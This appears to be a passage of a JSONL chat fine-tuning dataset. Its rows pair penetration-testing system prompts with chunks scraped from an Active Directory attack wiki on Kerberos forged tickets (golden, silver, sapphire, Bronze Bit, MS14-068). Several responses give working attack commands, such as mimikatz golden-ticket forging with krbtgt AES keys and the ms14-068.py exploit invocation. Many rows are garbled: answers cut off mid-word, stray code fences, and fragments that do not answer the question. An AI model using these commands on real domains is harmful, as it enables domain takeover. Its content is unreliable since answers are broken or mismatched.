/aes128:$krbtgt_aes128_key /user:randomuser /ptt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute with an AES 128 key?", "response": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:randomuser /ptt", "metadata": {"corpus_index": 600, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe with an AES 256 key in the context of penetration testing"}, {"role": "assistant", "content": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:randomuser /ptt\n``\n\nFor both mimikatz and Rubeus, the /ptt` flag is used to automatically inject the ticket.\n\n:::\n\n> [!TIP]\n> For Golden and Silver tickets, it's important to remember that, by default, ticketer and mimikatz forge tickets containing PACs that say the user belongs to some well-known administrators groups (i.e. group ids 513, 512, 520, 518, 519). There are scenarios where these groups are not enough (special machines where even Domain Admins don't have local admin rights).\n> \n> In these situations, testers can specify all the groups ids when creating the ticket. However, deny ACEs could actually prevent this from working. Encountering a Deny ACE preventing domain admins to log on could be an issue when having all groups ids in the ticket, including the domain admin group id. This solution can also be reall inconvenient in domains that have lots of groups.\n> \n> Another solution to this is to look for a specific user with appropriate rights to impersonate and use GoldenCopy to generate a command that allows to forge a ticket with specific values corresponding to the target user (sid, group ids, etc.). The values are gathered from a neo4j database.\n\n![](<./assets/GoldenCopy.png>)\n\nUsing GoldenCopy for specific user impersonation{.caption}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe with an AES 256 key in the context of penetration testing", "response": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:randomuser /ptt\n``\n\nFor both mimikatz and Rubeus, the /ptt` flag is used to automatically inject the ticket.\n\n:::\n\n> [!TIP]\n> For Golden and Silver tickets, it's important to remember that, by default, ticketer and mimikatz forge tickets containing PACs that say the user belongs to some well-known administrators groups (i.e. group ids 513, 512, 520, 518, 519). There are scenarios where these groups are not enough (special machines where even Domain Admins don't have local admin rights).\n> \n> In these situations, testers can specify all the groups ids when creating the ticket. However, deny ACEs could actually prevent this from working. Encountering a Deny ACE preventing domain admins to log on could be an issue when having all groups ids in the ticket, including the domain admin group id. This solution can also be reall inconvenient in domains that have lots of groups.\n> \n> Another solution to this is to look for a specific user with appropriate rights to impersonate and use GoldenCopy to generate a command that allows to forge a ticket with specific values corresponding to the target user (sid, group ids, etc.). The values are gathered from a neo4j database.\n\n![](<./assets/GoldenCopy.png>)\n\nUsing GoldenCopy for specific user impersonation{.caption}", "metadata": {"corpus_index": 601, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through with an AES 256 key"}, {"role": "assistant", "content": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:randomuser /ptt\n``\n\nFor both mimikatz and Rubeus, the /ptt` flag is used to automatically inject the ticket.\n\n:::\n\n> [!TIP]\n> For Golden and Silver tickets, it's important to remember that, by default, ticketer and mimikatz forge tickets containing PACs that say the user belongs to some well-known administrators groups (i.e. group ids 513, 512, 520, 518, 519). There are scenarios where these groups are not enough (special machines where even Domain Admins don't have local admin rights).\n> \n> In these situations, testers can specify all the groups ids when creating the ticket. However, deny ACEs could actually prevent this from working. Encountering a Deny ACE preventing domain admins to log on could be an issue when having all groups ids in the ticket, including the domain admin group id. This solution can also be reall inconvenient in domains that have lots of groups.\n> \n> Another solution to this is to look for a specific user with appropriate rights to impersonate and use GoldenCopy to generate a command that allows to forge a ticket with specific values corresponding to the target user (sid, group ids, etc.). The values are gathered from a neo4j database.\n\n![](<./assets/GoldenCopy.png>)\n\nUsing GoldenCopy for specific user impersonation{.caption}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through with an AES 256 key", "response": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:randomuser /ptt\n``\n\nFor both mimikatz and Rubeus, the /ptt` flag is used to automatically inject the ticket.\n\n:::\n\n> [!TIP]\n> For Golden and Silver tickets, it's important to remember that, by default, ticketer and mimikatz forge tickets containing PACs that say the user belongs to some well-known administrators groups (i.e. group ids 513, 512, 520, 518, 519). There are scenarios where these groups are not enough (special machines where even Domain Admins don't have local admin rights).\n> \n> In these situations, testers can specify all the groups ids when creating the ticket. However, deny ACEs could actually prevent this from working. Encountering a Deny ACE preventing domain admins to log on could be an issue when having all groups ids in the ticket, including the domain admin group id. This solution can also be reall inconvenient in domains that have lots of groups.\n> \n> Another solution to this is to look for a specific user with appropriate rights to impersonate and use GoldenCopy to generate a command that allows to forge a ticket with specific values corresponding to the target user (sid, group ids, etc.). The values are gathered from a neo4j database.\n\n![](<./assets/GoldenCopy.png>)\n\nUsing GoldenCopy for specific user impersonation{.caption}", "metadata": {"corpus_index": 601, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Forged tickets in the context of penetration testing"}, {"role": "assistant", "content": "Silver, Golden, Diamond and Sapphire tickets are forged or modified Kerberos tickets that can be used with pass-the-ticket to access services in an Active Directory domain.\n\n::: details Glossary\nPAC (Privileged Authentication Certificate): a special set of data contained in the ticket (TGT or Service Ticket) that give information about the requesting user (username, groups, UserAccountControl, etc.).\n\nLong-term key: the long-term key of an account refers to its NT hash (when the RC4 etype is not disabled in the domain) or another Kerberos key (DES, AES128, AES256).\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Forged tickets in the context of penetration testing", "response": "Silver, Golden, Diamond and Sapphire tickets are forged or modified Kerberos tickets that can be used with pass-the-ticket to access services in an Active Directory domain.\n\n::: details Glossary\nPAC (Privileged Authentication Certificate): a special set of data contained in the ticket (TGT or Service Ticket) that give information about the requesting user (username, groups, UserAccountControl, etc.).\n\nLong-term key: the long-term key of an account refers to its NT hash (when the RC4 etype is not disabled in the domain) or another Kerberos key (DES, AES128, AES256).\n:::", "metadata": {"corpus_index": 602, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/index.md", "page_title": "Forged tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Forged tickets during a pentest?"}, {"role": "assistant", "content": "Silver, Golden, Diamond and Sapphire tickets are forged or modified Kerberos tickets that can be used with pass-the-ticket to access services in an Active Directory domain.\n\n::: details Glossary\nPAC (Privileged Authentication Certificate): a special set of data contained in the ticket (TGT or Service Ticket) that give information about the requesting user (username, groups, UserAccountControl, etc.).\n\nLong-term key: the long-term key of an account refers to its NT hash (when the RC4 etype is not disabled in the domain) or another Kerberos key (DES, AES128, AES256).\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Forged tickets during a pentest?", "response": "Silver, Golden, Diamond and Sapphire tickets are forged or modified Kerberos tickets that can be used with pass-the-ticket to access services in an Active Directory domain.\n\n::: details Glossary\nPAC (Privileged Authentication Certificate): a special set of data contained in the ticket (TGT or Service Ticket) that give information about the requesting user (username, groups, UserAccountControl, etc.).\n\nLong-term key: the long-term key of an account refers to its NT hash (when the RC4 etype is not disabled in the domain) or another Kerberos key (DES, AES128, AES256).\n:::", "metadata": {"corpus_index": 602, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/index.md", "page_title": "Forged tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Forged tickets - Silver tickets in the context of penetration testing"}, {"role": "assistant", "content": "The long-term key of a service account can be used to forge a Service ticket that can later be used with Pass-the-ticket to access that service. In a Silver Ticket scenario, an attacker will forge a Service Ticket containing a PAC that features arbitrary information about the requesting user, effectively granting lots of access.\n\n> [!TIP]\n> Read the Silver ticket article for more insight"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Forged tickets - Silver tickets in the context of penetration testing", "response": "The long-term key of a service account can be used to forge a Service ticket that can later be used with Pass-the-ticket to access that service. In a Silver Ticket scenario, an attacker will forge a Service Ticket containing a PAC that features arbitrary information about the requesting user, effectively granting lots of access.\n\n> [!TIP]\n> Read the Silver ticket article for more insight", "metadata": {"corpus_index": 603, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/index.md", "page_title": "Forged tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Forged tickets - Silver tickets"}, {"role": "assistant", "content": "The long-term key of a service account can be used to forge a Service ticket that can later be used with Pass-the-ticket to access that service. In a Silver Ticket scenario, an attacker will forge a Service Ticket containing a PAC that features arbitrary information about the requesting user, effectively granting lots of access.\n\n> [!TIP]\n> Read the Silver ticket article for more insight"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Forged tickets - Silver tickets", "response": "The long-term key of a service account can be used to forge a Service ticket that can later be used with Pass-the-ticket to access that service. In a Silver Ticket scenario, an attacker will forge a Service Ticket containing a PAC that features arbitrary information about the requesting user, effectively granting lots of access.\n\n> [!TIP]\n> Read the Silver ticket article for more insight", "metadata": {"corpus_index": 603, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/index.md", "page_title": "Forged tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Forged tickets - Sapphire ticket in the context of penetration testing"}, {"role": "assistant", "content": "Sapphire tickets are similar to Diamond tickets in the way the ticket is not forged, but instead based on a legitimate one obtained after a request. The difference lays in how the PAC is modified. The Diamond ticket approach modifies the legitimate PAC to add some privileged groups (or replace it with a fully-forged one). In the Sapphire ticket approach, the PAC of another powerful user is obtained through an S4U2self+u2u trick. This PAC then replaces the one featured in the legitimate ticket. The resulting ticket is an assembly of legitimate elements, and follows a standard ticket request, which makes it then most difficult silver/golden ticket variant to detect.\n\n> [!TIP]\n> Read the Sapphire ticket article for more insight"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Forged tickets - Sapphire ticket in the context of penetration testing", "response": "Sapphire tickets are similar to Diamond tickets in the way the ticket is not forged, but instead based on a legitimate one obtained after a request. The difference lays in how the PAC is modified. The Diamond ticket approach modifies the legitimate PAC to add some privileged groups (or replace it with a fully-forged one). In the Sapphire ticket approach, the PAC of another powerful user is obtained through an S4U2self+u2u trick. This PAC then replaces the one featured in the legitimate ticket. The resulting ticket is an assembly of legitimate elements, and follows a standard ticket request, which makes it then most difficult silver/golden ticket variant to detect.\n\n> [!TIP]\n> Read the Sapphire ticket article for more insight", "metadata": {"corpus_index": 604, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/index.md", "page_title": "Forged tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Forged tickets - Sapphire ticket"}, {"role": "assistant", "content": "Sapphire tickets are similar to Diamond tickets in the way the ticket is not forged, but instead based on a legitimate one obtained after a request. The difference lays in how the PAC is modified. The Diamond ticket approach modifies the legitimate PAC to add some privileged groups (or replace it with a fully-forged one). In the Sapphire ticket approach, the PAC of another powerful user is obtained through an S4U2self+u2u trick. This PAC then replaces the one featured in the legitimate ticket. The resulting ticket is an assembly of legitimate elements, and follows a standard ticket request, which makes it then most difficult silver/golden ticket variant to detect.\n\n> [!TIP]\n> Read the Sapphire ticket article for more insight"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Forged tickets - Sapphire ticket", "response": "Sapphire tickets are similar to Diamond tickets in the way the ticket is not forged, but instead based on a legitimate one obtained after a request. The difference lays in how the PAC is modified. The Diamond ticket approach modifies the legitimate PAC to add some privileged groups (or replace it with a fully-forged one). In the Sapphire ticket approach, the PAC of another powerful user is obtained through an S4U2self+u2u trick. This PAC then replaces the one featured in the legitimate ticket. The resulting ticket is an assembly of legitimate elements, and follows a standard ticket request, which makes it then most difficult silver/golden ticket variant to detect.\n\n> [!TIP]\n> Read the Sapphire ticket article for more insight", "metadata": {"corpus_index": 604, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/index.md", "page_title": "Forged tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Forged tickets - The bronze bit vuln?"}, {"role": "assistant", "content": "The Bronze bit vulnerability (CVE-2020-17049) introduced the possibility of forwarding service tickets when it shouldn't normally be possible (protected users, unconstrained delegation, constrained delegation configured with protocol transition).\n\n![](<./assets/Kerberos delegations mindmap.png>)\nKerberos delegations mindmap{.caption}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Forged tickets - The bronze bit vuln?", "response": "The Bronze bit vulnerability (CVE-2020-17049) introduced the possibility of forwarding service tickets when it shouldn't normally be possible (protected users, unconstrained delegation, constrained delegation configured with protocol transition).\n\n![](<./assets/Kerberos delegations mindmap.png>)\nKerberos delegations mindmap{.caption}", "metadata": {"corpus_index": 605, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/index.md", "page_title": "Forged tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Forged tickets - The bronze bit vuln?"}, {"role": "assistant", "content": "The Bronze bit vulnerability (CVE-2020-17049) introduced the possibility of forwarding service tickets when it shouldn't normally be possible (protected users, unconstrained delegation, constrained delegation configured with protocol transition).\n\n![](<./assets/Kerberos delegations mindmap.png>)\nKerberos delegations mindmap{.caption}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Forged tickets - The bronze bit vuln?", "response": "The Bronze bit vulnerability (CVE-2020-17049) introduced the possibility of forwarding service tickets when it shouldn't normally be possible (protected users, unconstrained delegation, constrained delegation configured with protocol transition).\n\n![](<./assets/Kerberos delegations mindmap.png>)\nKerberos delegations mindmap{.caption}", "metadata": {"corpus_index": 605, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/index.md", "page_title": "Forged tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is MS14-068 - Theory?"}, {"role": "assistant", "content": "This vulnerability allows attackers to forge a TGT with high privileges (i.e. with a modified PAC stating the user is a member of privileged groups). This attack is similar to the Golden ticket, however, it doesn't require the attacker to know the krbtgt. This attack is a really powerful privilege escalation technique, however, it relies on a 2014 bug and will not work on patched domain controllers.\n\nThis vulnerability is possible due to a misvalidation of the PAC signature, allowing to craft a PAC granting powerful rights to a user while still being legitimate in the eyes of the KDC(Key Distribution Center). Contrary to what Microsoft doc states here, there are more than three SignatureTypes accepted by the KDC : before MS14-068 patch, a signature was considered valid by KdcVerifyPacSignature if its size was <= 20 bytes. Therefore, it was possible to sign a PAC with a non-keyed hashing algorithm such as MD5 and have this PAC be considered valid.\n\n> [!TIP]\n> A non-keyed algorithm is a type of encryption that does not use a key to encrypt or decrypt the data. It uses instead a fixed algorithm, which makes it much less secure than a keyed algorithm. Non-keyed algorithms are usually easier to crack or break because they do not have the added security of a key to protect the data.\n\nThe exploitation goes as follow:\n\n1. A PAC-less TGT is obtained via an AS-REQ with the PA-PAC-REQUEST attribute set to false. This will be used in a later step.\n2. A PAC indicating an account membership to powerful groups in the domain is forged and \"signed\" with MD5 (or any other non-keyed algorithm listed here).\n3. A TGS-REQ message, requesting a service ticket targeting the KRBTGT service (i.e. a TGT-like) is sent to the vulnerable KDC, using the forged PAC from step (2) encrypted with a sub-session key (usually the session key) and included in the TGT from step (1).\n4. In response to step (3), a new TGT containing the forged PAC will be received from the vulnerable KDC after its validatio"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is MS14-068 - Theory?", "response": "This vulnerability allows attackers to forge a TGT with high privileges (i.e. with a modified PAC stating the user is a member of privileged groups). This attack is similar to the Golden ticket, however, it doesn't require the attacker to know the krbtgt. This attack is a really powerful privilege escalation technique, however, it relies on a 2014 bug and will not work on patched domain controllers.\n\nThis vulnerability is possible due to a misvalidation of the PAC signature, allowing to craft a PAC granting powerful rights to a user while still being legitimate in the eyes of the KDC(Key Distribution Center). Contrary to what Microsoft doc states here, there are more than three SignatureTypes accepted by the KDC : before MS14-068 patch, a signature was considered valid by KdcVerifyPacSignature if its size was <= 20 bytes. Therefore, it was possible to sign a PAC with a non-keyed hashing algorithm such as MD5 and have this PAC be considered valid.\n\n> [!TIP]\n> A non-keyed algorithm is a type of encryption that does not use a key to encrypt or decrypt the data. It uses instead a fixed algorithm, which makes it much less secure than a keyed algorithm. Non-keyed algorithms are usually easier to crack or break because they do not have the added security of a key to protect the data.\n\nThe exploitation goes as follow:\n\n1. A PAC-less TGT is obtained via an AS-REQ with the PA-PAC-REQUEST attribute set to false. This will be used in a later step.\n2. A PAC indicating an account membership to powerful groups in the domain is forged and \"signed\" with MD5 (or any other non-keyed algorithm listed here).\n3. A TGS-REQ message, requesting a service ticket targeting the KRBTGT service (i.e. a TGT-like) is sent to the vulnerable KDC, using the forged PAC from step (2) encrypted with a sub-session key (usually the session key) and included in the TGT from step (1).\n4. In response to step (3), a new TGT containing the forged PAC will be received from the vulnerable KDC after its validatio", "metadata": {"corpus_index": 606, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform MS14-068 - Theory?"}, {"role": "assistant", "content": "This vulnerability allows attackers to forge a TGT with high privileges (i.e. with a modified PAC stating the user is a member of privileged groups). This attack is similar to the Golden ticket, however, it doesn't require the attacker to know the krbtgt. This attack is a really powerful privilege escalation technique, however, it relies on a 2014 bug and will not work on patched domain controllers.\n\nThis vulnerability is possible due to a misvalidation of the PAC signature, allowing to craft a PAC granting powerful rights to a user while still being legitimate in the eyes of the KDC(Key Distribution Center). Contrary to what Microsoft doc states here, there are more than three SignatureTypes accepted by the KDC : before MS14-068 patch, a signature was considered valid by KdcVerifyPacSignature if its size was <= 20 bytes. Therefore, it was possible to sign a PAC with a non-keyed hashing algorithm such as MD5 and have this PAC be considered valid.\n\n> [!TIP]\n> A non-keyed algorithm is a type of encryption that does not use a key to encrypt or decrypt the data. It uses instead a fixed algorithm, which makes it much less secure than a keyed algorithm. Non-keyed algorithms are usually easier to crack or break because they do not have the added security of a key to protect the data.\n\nThe exploitation goes as follow:\n\n1. A PAC-less TGT is obtained via an AS-REQ with the PA-PAC-REQUEST attribute set to false. This will be used in a later step.\n2. A PAC indicating an account membership to powerful groups in the domain is forged and \"signed\" with MD5 (or any other non-keyed algorithm listed here).\n3. A TGS-REQ message, requesting a service ticket targeting the KRBTGT service (i.e. a TGT-like) is sent to the vulnerable KDC, using the forged PAC from step (2) encrypted with a sub-session key (usually the session key) and included in the TGT from step (1).\n4. In response to step (3), a new TGT containing the forged PAC will be received from the vulnerable KDC after its validatio"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform MS14-068 - Theory?", "response": "This vulnerability allows attackers to forge a TGT with high privileges (i.e. with a modified PAC stating the user is a member of privileged groups). This attack is similar to the Golden ticket, however, it doesn't require the attacker to know the krbtgt. This attack is a really powerful privilege escalation technique, however, it relies on a 2014 bug and will not work on patched domain controllers.\n\nThis vulnerability is possible due to a misvalidation of the PAC signature, allowing to craft a PAC granting powerful rights to a user while still being legitimate in the eyes of the KDC(Key Distribution Center). Contrary to what Microsoft doc states here, there are more than three SignatureTypes accepted by the KDC : before MS14-068 patch, a signature was considered valid by KdcVerifyPacSignature if its size was <= 20 bytes. Therefore, it was possible to sign a PAC with a non-keyed hashing algorithm such as MD5 and have this PAC be considered valid.\n\n> [!TIP]\n> A non-keyed algorithm is a type of encryption that does not use a key to encrypt or decrypt the data. It uses instead a fixed algorithm, which makes it much less secure than a keyed algorithm. Non-keyed algorithms are usually easier to crack or break because they do not have the added security of a key to protect the data.\n\nThe exploitation goes as follow:\n\n1. A PAC-less TGT is obtained via an AS-REQ with the PA-PAC-REQUEST attribute set to false. This will be used in a later step.\n2. A PAC indicating an account membership to powerful groups in the domain is forged and \"signed\" with MD5 (or any other non-keyed algorithm listed here).\n3. A TGS-REQ message, requesting a service ticket targeting the KRBTGT service (i.e. a TGT-like) is sent to the vulnerable KDC, using the forged PAC from step (2) encrypted with a sub-session key (usually the session key) and included in the TGT from step (1).\n4. In response to step (3), a new TGT containing the forged PAC will be received from the vulnerable KDC after its validatio", "metadata": {"corpus_index": 606, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does MS14-068 - Practice work?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\n> [!TIP]\n> Referring to kekeo's wiki might help untangle some situations but errors like KDC_ERR_SUMTYPE_NOSUPP (15) or KRB_ERR_GENERIC (60) when trying to use the generated .ccache ticket should mean the target is patched.\n\nPyKEK\n\nThis attack can be operated with pykek's ms14-068 Python script. The script can carry out the attack with a cleartext password or with pass-the-hash.\n\nIn order to operate the attack, knowing a domain account’s name, its password (or hash) and its SID are needed.\n\nA TGT can then be obtained with one of the following commands.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does MS14-068 - Practice work?", "response": "::: tabs\n\n=== UNIX-like\n\n> [!TIP]\n> Referring to kekeo's wiki might help untangle some situations but errors like KDC_ERR_SUMTYPE_NOSUPP (15) or KRB_ERR_GENERIC (60) when trying to use the generated .ccache ticket should mean the target is patched.\n\nPyKEK\n\nThis attack can be operated with pykek's ms14-068 Python script. The script can carry out the attack with a cleartext password or with pass-the-hash.\n\nIn order to operate the attack, knowing a domain account’s name, its password (or hash) and its SID are needed.\n\nA TGT can then be obtained with one of the following commands.\n\n```bash", "metadata": {"corpus_index": 607, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out MS14-068 - Practice during a pentest?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\n> [!TIP]\n> Referring to kekeo's wiki might help untangle some situations but errors like KDC_ERR_SUMTYPE_NOSUPP (15) or KRB_ERR_GENERIC (60) when trying to use the generated .ccache ticket should mean the target is patched.\n\nPyKEK\n\nThis attack can be operated with pykek's ms14-068 Python script. The script can carry out the attack with a cleartext password or with pass-the-hash.\n\nIn order to operate the attack, knowing a domain account’s name, its password (or hash) and its SID are needed.\n\nA TGT can then be obtained with one of the following commands.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out MS14-068 - Practice during a pentest?", "response": "::: tabs\n\n=== UNIX-like\n\n> [!TIP]\n> Referring to kekeo's wiki might help untangle some situations but errors like KDC_ERR_SUMTYPE_NOSUPP (15) or KRB_ERR_GENERIC (60) when trying to use the generated .ccache ticket should mean the target is patched.\n\nPyKEK\n\nThis attack can be operated with pykek's ms14-068 Python script. The script can carry out the attack with a cleartext password or with pass-the-hash.\n\nIn order to operate the attack, knowing a domain account’s name, its password (or hash) and its SID are needed.\n\nA TGT can then be obtained with one of the following commands.\n\n```bash", "metadata": {"corpus_index": 607, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is with a plaintext password?"}, {"role": "assistant", "content": "ms14-068.py -u \"$BASICUSER\"@\"$DOMAIN_FQDN\" -p \"$PASSWORD\" -s \"$BASICUSER_SID\" -d \"$DC_HOST\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is with a plaintext password?", "response": "ms14-068.py -u \"$BASICUSER\"@\"$DOMAIN_FQDN\" -p \"$PASSWORD\" -s \"$BASICUSER_SID\" -d \"$DC_HOST\"", "metadata": {"corpus_index": 608, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through with a plaintext password"}, {"role": "assistant", "content": "ms14-068.py -u \"$BASICUSER\"@\"$DOMAIN_FQDN\" -p \"$PASSWORD\" -s \"$BASICUSER_SID\" -d \"$DC_HOST\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through with a plaintext password", "response": "ms14-068.py -u \"$BASICUSER\"@\"$DOMAIN_FQDN\" -p \"$PASSWORD\" -s \"$BASICUSER_SID\" -d \"$DC_HOST\"", "metadata": {"corpus_index": 608, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": 